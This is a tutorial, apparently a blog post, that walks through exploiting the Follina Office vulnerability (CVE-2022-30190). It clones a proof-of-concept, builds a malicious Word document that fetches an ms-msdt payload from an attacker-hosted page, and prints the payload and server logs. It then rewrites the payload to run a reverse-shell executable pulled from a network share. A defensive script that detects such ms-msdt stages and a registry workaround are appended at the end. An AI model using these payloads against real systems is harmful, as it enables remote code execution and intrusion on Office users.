In this tutorial we will go through Follina (CVE-2022-30190), a very easy to exploit vulnerability that can be used to perform command execution. The exploit is easy to build, as commands can be executed on the remote system without any prompt. Because it does not require any macro and is simple to develop, attackers can easily use it to enter an enterprise network via email, with the victim opening the file using Microsoft Office. We will also try to find a detection mechanism so that we can protect ourselves.

exploit

From the GitHub [1] source we first have to download the content and then execute it. To download, we can use the following command:

$ git clone https://github.com/ItsNee/Follina-CVE-2022-30190-POC.git
Cloning into 'Follina-CVE-2022-30190-POC'...
remote: Enumerating objects: 57, done.
remote: Counting objects: 100% (57/57), done.
remote: Compressing objects: 100% (43/43), done.
remote: Total 57 (delta 12), reused 38 (delta 7), pack-reused 0
Receiving objects: 100% (57/57), 683.23 KiB | 927.00 KiB/s, done.
Resolving deltas: 100% (12/12), done.

After downloading we can see that there is a Python file called follina.py, and we will use the command below to generate the malicious file. Note that here the port number seems fixed to 1337; I have tried other ports but they seem to cause some problems.

$ python3 follina.py --payload-url "http://192.168.1.160:1337/pwn.html"
Folina - CVE-2022-30190 Proof of Concept by Nee
Building malicious word document....
Done! Send word doc over to your target and profit
Hosting the payload under the web directory
serving at port 1337

Let's keep this terminal open and running. We will see an additional file called poisonedWordFile.doc in the directory.

$ ll
total 20K
drwxr-xr-x 1 x8006 x8006  124 Sep 17 03:58 .
drwxr-xr-x 1 x8006 x8006   52 Sep 16 23:23 ..
-rw-r--r-- 1 x8006 x8006 2.3K Sep 16 23:23 follina.py
drwxr-xr-x 1 x8006 x8006  138 Sep 16 23:23 .git
drwxr-xr-x 1 x8006 x8006   72 Sep 16 23:23 ohno
-rw-r--r-- 1 x8006 x8006  11K Sep 17 03:58 poisonedWordFile.doc
-rw-r--r-- 1 x8006 x8006  485 Sep 16 23:23 README.md
drwxr-xr-x 1 x8006 x8006   56 Sep 16 23:23 source_files
drwxr-xr-x 1 x8006 x8006   16 Sep 16 23:23 web

Let us now transfer the file to the victim machine and try to open it using Microsoft Word. When we try to open the file, we will

192.168.1.104 - - [17/Sep/2022 04:03:58] code 501, message Unsupported method ('OPTIONS')
192.168.1.104 - - [17/Sep/2022 04:03:58] "OPTIONS / HTTP/1.1" 501 -
192.168.1.104 - - [17/Sep/2022 04:03:58] "HEAD /pwn.html HTTP/1.1" 200 -
192.168.1.104 - - [17/Sep/2022 04:03:58] code 501, message Unsupported method ('OPTIONS')
192.168.1.104 - - [17/Sep/2022 04:03:58] "OPTIONS / HTTP/1.1" 501 -
192.168.1.104 - - [17/Sep/2022 04:03:58] "GET /pwn.html HTTP/1.1" 200 -
192.168.1.104 - - [17/Sep/2022 04:03:59] "HEAD /pwn.html HTTP/1.1" 200 -
192.168.1.104 - - [17/Sep/2022 04:03:59] "HEAD /pwn.html HTTP/1.1" 200 -
192.168.1.104 - - [17/Sep/2022 04:03:59] code 501, message Unsupported method ('OPTIONS')
192.168.1.104 - - [17/Sep/2022 04:03:59] "OPTIONS / HTTP/1.1" 501 -
192.168.1.104 - - [17/Sep/2022 04:03:59] "HEAD /pwn.html HTTP/1.1" 200 -
192.168.1.104 - - [17/Sep/2022 04:03:59] code 501, message Unsupported method ('OPTIONS')
192.168.1.104 - - [17/Sep/2022 04:03:59] "OPTIONS / HTTP/1.1" 501 -
192.168.1.104 - - [17/Sep/2022 04:03:59] "GET /pwn.html HTTP/1.1" 304 -
192.168.1.104 - - [17/Sep/2022 04:03:59] "HEAD /pwn.html HTTP/1.1" 200 -
192.168.1.104 - - [17/Sep/2022 04:03:59] "HEAD /pwn.html HTTP/1.1" 200 -
192.168.1.104 - - [17/Sep/2022 04:04:01] "HEAD /pwn.html HTTP/1.1" 200 -

As we can see, after running the code a file called pwn.html is requested from the attacker's machine and provides the rest of the payload.

On the client side we can see calc.exe popping up! (screenshot)

reverse shell

We will now change the code in such a way that we can obtain a remote shell, just to show how effective this attack can be against Microsoft Office based systems. To understand how we will develop our reverse shell, we first have to understand the content of the pwn.html file, as it seems to provide the staged payload for this exploit. If we take a look, we will see the following:

$ cat ./web/pwn.html
<!-- fillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfiller -->

[SNIP]

<!-- fillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfillerfiller -->
<script>
    location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(\\\\\\\\localhost\\\\c$\\\\windows\\\\system32\\\\calc)/.exe\"";
</script>

As we can see, it uses the ms-msdt tool to launch our program, and the program being launched is calc.exe. Now let's modify it!

remote shell

The command above pops up calc. We need a format in which a remote executable is called instead. I have now created a Python script which acts as a reverse shell and used PyInstaller to make a one-file executable. After the executable was created, I put it into a shared folder called pubshare. We will now change the script section in the pwn.html file as given below.

<script>
location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(\\\\\\\\DESKTOP-IG526RS\\\\pubshare\\\\r_shell)/.exe\"";
</script>

When we double-click on the malicious document, we get a shell! (screenshot)
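On the detection side, a small triage script (added here as an example; it is not part of the original post or the PoC repository) can scan an HTML stage like the pwn.html shown above, un-escape the ms-msdt: URI and report the path traversal and $(...) command substitution that both the calc variant and the pubshare variant rely on. The sample page is constructed from the snippet above, with the launched path kept as a placeholder.

```python
import re

# Constructed sample modelled on the pwn.html stage shown on this page; the
# host and path inside $(...) come from the page and are not a real target.
SAMPLE_STAGE = r'''<!-- fillerfillerfillerfillerfillerfillerfillerfillerfiller -->
<script>
    location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(\\\\\\\\localhost\\\\c$\\\\windows\\\\system32\\\\calc)/.exe\"";
</script>'''

# Constructed benign page: a redirect that uses an ordinary https: URL.
BENIGN_PAGE = '<script>location.href = "https://example.invalid/help";</script>'

# An ms-msdt: URI inside a JavaScript string literal runs up to the first
# unescaped double quote; escaped quotes (\") are part of the URI.
MSDT_URI = re.compile(r'ms-msdt:(?:[^"\\]|\\.)*', re.IGNORECASE)
BROWSE_PARAM = re.compile(r'IT_BrowseForFile=([^"]*)', re.IGNORECASE)
SUBSTITUTION = re.compile(r'\$\(([^)]*)\)')


def js_unescape(s):
    """Collapse JavaScript backslash escapes (backslash + char -> char) so the
    URI reads the way the page hands it to the protocol handler."""
    return re.sub(r'\\(.)', r'\1', s)


def scan_stage(html):
    """Return a triage report for one HTML stage. 'suspicious' is True when an
    ms-msdt: URI combines directory traversal in IT_BrowseForFile with a $(...)
    substitution; 'launches' lists what each substitution would run."""
    report = {'suspicious': False, 'msdt_uris': [], 'launches': []}
    for m in MSDT_URI.finditer(html):
        uri = js_unescape(m.group(0))
        report['msdt_uris'].append(uri)
        browse = BROWSE_PARAM.search(uri)
        if not browse:
            continue
        target = browse.group(1)
        traversal = '/../' in target or '\\..\\' in target
        launches = SUBSTITUTION.findall(target)
        report['launches'].extend(launches)
        if traversal and launches:
            report['suspicious'] = True
    return report


if __name__ == '__main__':
    for name, page in (('sample stage', SAMPLE_STAGE), ('benign page', BENIGN_PAGE)):
        r = scan_stage(page)
        print(name, '->', 'SUSPICIOUS' if r['suspicious'] else 'clean', r['launches'])
```

Because the whole chain depends on the ms-msdt: handler being registered, the workaround Microsoft published at the time (export and then delete the HKEY_CLASSES_ROOT\ms-msdt registry key) blocks the launch regardless of what the stage contains.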

disclaimer

The information provided on this website is for educational and informational purposes only. The website owner and contributors do not condone or encourage any illegal activities, including hacking, cyberattacks, or unauthorized access to computer systems or networks.

All information and tools provided on this website are to be used at your own risk. We do not take any responsibility for how you choose to use the information or tools provided here. Users are strongly encouraged to conduct their own research and follow ethical guidelines and legal regulations when using the information and tools presented on this website.

reference

  1. https://github.com/ItsNee/Follina-CVE-2022-30190-POC